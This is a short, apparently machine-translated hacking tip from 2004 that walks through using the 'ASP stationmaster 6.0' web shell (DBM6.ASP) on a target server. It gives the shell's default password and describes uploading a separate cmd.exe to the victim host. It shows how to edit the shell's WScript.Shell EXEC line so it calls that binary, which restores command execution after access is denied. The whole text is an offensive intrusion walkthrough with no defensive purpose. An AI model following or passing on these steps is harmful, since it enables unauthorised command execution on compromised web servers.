Black Temptation 1. Upload the DBM6.ASP file of the ASP stationmaster 6.0 to the target. 2. Open uploaded DBM6.asp from the browser, enter the initial password: gxgl.com3. At this time, at the ASP stationmaster assistant 6.0 click the command line module, display "Deny Access" 4. Upload the file with the ASP stationmaster 6.0 The module uploads a local cmd.exe to your target host. 5. Use Notepad to open the modified code to find the code that calls cmd.exe original: si = Si & Server.createObject ("wscript.shell"). EXEC ("cmd.exe / c" & defcmd) .stdout.readall Modified: Si = Si & Server.createObject ("wscript.shell"). EXEC ("You want to upload cmd.exe absolute path / c" & defcmd) .Stdout.Readall, such as the directory you uploaded here is D: / cmd. EXE is then modified to: Si = Si & Server.createObject ("wscript.shell"). EXEC ("D: /cmd.exe / c" & defcmd) .Stdout.ReadALL Re-transferred to the target host overwriting the original dbm6.asp . 6. At this time, at the ASP stationmaster assistant 6.0, click the command line module, huh, huh, look at the long-lost black and white picture ~~~ [This is Yesterday QQ, a friend called Xiaogong, asked my question, I am today Specially went to use it, then tell him here, the way is limited, it is very simple, I don't know if you can understand it. ILEBOY 2004/11/4
